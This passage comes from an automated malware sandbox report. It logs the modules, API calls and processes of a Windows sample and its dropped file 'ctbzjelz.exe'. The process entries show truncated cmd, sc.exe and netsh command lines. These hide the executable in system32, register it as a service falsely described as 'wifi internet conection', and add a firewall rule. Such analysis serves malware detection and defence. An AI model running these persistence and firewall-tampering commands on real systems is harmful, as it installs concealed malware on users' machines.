\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has an writable section named \".text\"\n \"ctbzjelz.exe\" has an writable section named \".data\"\n \"ctbzjelz.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xafb000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xbb8000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"ctbzjelz.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"KERNEL32.DLL\" at base 77460000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"WS2_32.DLL\" at base 76d20000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"DBGHELP.DLL\" at base 6eb70000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"USER32.DLL\" at base 75c50000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"ADVAPI32.DLL\" at base 773b0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"SHELL32.DLL\" at base 76030000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"OLEAUT32.DLL\" at base 77170000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"MSVCR100.DLL\" at base 6bb70000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"NTDLL.DLL\" at base 77820000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"OLE32.DLL\" at base 77570000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 742f0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"PROPSYS.DLL\" at base 74430000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"APPHELP.DLL\" at base 755d0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"CLBCATQ.DLL\" at base 75bc0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6aa80000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 77460000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"SETUPAPI.DLL\" at base 77210000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"RPCRT4.DLL\" at base 75ac0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74430000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75b70000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"PROFAPI.DLL\" at base 75740000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75a50000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 776d0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"SECUR32.DLL\" at base 75460000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 758d0000\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ce0000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"cmd.exe\" loaded module \"KERNEL32\" at base 77460000\n \"cmd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"GDI32.DLL\" at base 75a70000\n \"sc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75b90000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ce0000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"sc.exe\" loaded module \"KERNEL32\" at base 77460000\n \"sc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"sc.exe\" loaded module \"RPCRT4.DLL\" at base 75ac0000\n \"ctbzjelz.exe\" loaded module \"GDI32.DLL\" at base 75a70000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 75b90000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ce0000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ctbzjelz.exe\" loaded module \"KERNEL32\" at base 77460000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c6e0000\n \"ctbzjelz.exe\" loaded module \"KERNEL32.DLL\" at base 77460000\n \"ctbzjelz.exe\" loaded module \"WS2_32.DLL\" at base 76d20000\n \"ctbzjelz.exe\" loaded module \"DBGHELP.DLL\" at base 6eb70000\n \"ctbzjelz.exe\" loaded module \"USER32.DLL\" at base 75c50000\n \"ctbzjelz.exe\" loaded module \"ADVAPI32.DLL\" at base 773b0000\n \"ctbzjelz.exe\" loaded module \"SHELL32.DLL\" at base 76030000\n \"ctbzjelz.exe\" loaded module \"OLEAUT32.DLL\" at base 77170000\n \"ctbzjelz.exe\" loaded module \"MSVCR100.DLL\" at base 6bb70000\n \"ctbzjelz.exe\" loaded module \"SSPICLI.DLL\" at base 755b0000\n \"ctbzjelz.exe\" loaded module \"RPCRT4.DLL\" at base 75ac0000\n \"ctbzjelz.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75b70000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70ce0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 77460000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32.DLL\" at base 77460000\n \"svchost.exe\" loaded module \"NTDLL.DLL\" at base 77820000\n \"svchost.exe\" loaded module \"IPHLPAPI.DLL\" at base 73a80000\n \"svchost.exe\" loaded module \"DHCPCSVC.DLL\" at base 737e0000\n \"svchost.exe\" loaded module \"RPCRT4.DLL\" at base 75ac0000\n \"svchost.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73890000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 73fd0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 739a0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75b70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 738d0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 750f0000\n \"svchost.exe\" loaded module \"DNSAPI.DLL\" at base 74fb0000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73990000\n \"svchost.exe\" loaded module \"WS2_32.DLL\" at base 76d20000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73940000\n \"svchost.exe\" loaded module \"RASADHLP.DLL\" at base 71e60000\n \"svchost.exe\" loaded module \"SSPICLI.DLL\" at base 755b0000\n \"svchost.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75b70000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74c50000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 75c50000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75bc0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6bfd0000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 773b0000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 75b70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 75b70000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 75b70000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 77570000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75b70000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 756c0000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6e840000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75770000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74d00000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 74e00000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 77460000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77170000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005548)\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005548)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001588)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001588)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001588)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001588)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002472)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00002820)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00002820)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002820)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002820)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002820)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002820)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00001512)\n \"ctbzjelz.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00001512)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003044)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003044)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002528)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002528)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000\n \"ctbzjelz.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75AC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ctbzjelz.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ctbzjelz.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00005904)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00001588)\n Spawned process \"sc.exe\" with commandline \"create aweovprv binPath= \"%WINDIR%\\\\system32\\\\aweovprv\\\\ctbzjelz ...\" (UID: 00000000-00004644), Spawned process \"sc.exe\" with commandline \"description aweovprv \"wifi internet conection\"\" (UID: 00000000-00002472), Spawned process \"sc.exe\" with commandline \"start aweovprv\" (UID: 00000000-00002820), Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e10 ...\" (UID: 00000000-00001512)\n Spawned process \"svchost.exe\" (UID: 00000000-00003044)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002528)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00005904)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\aweovprv\\\\\" (UID: 00000000-00001588)\n Spawned process \"sc.exe\" with commandline \"create aweovprv binPath= \"%WINDIR%\\\\system32\\\\aweovprv\\\\ctbzjelz ...\" (UID: 00000000-00004644), Spawned process \"sc.exe\" with commandline \"description aweovprv \"wifi internet conection\"\" (UID: 00000000-00002472), Spawned process \"sc.exe\" with commandline \"start aweovprv\" (UID: 00000000-00002820), Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e10 ...\" (UID: 00000000-00001512)\n Spawned process \"svchost.exe\" (UID: 00000000-00003044)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002528)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"ctbzjelz.exe\" (UID: 00000000-00001512) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"ctbzjelz.exe\" (UID: 00000000-00001512) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002528) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002528) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"d510af41349a55e3d3c3233acb0540c72492301d3fc360d6aa7c47e1037cd2c2\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"ctbzjelz.exe\" was detected as 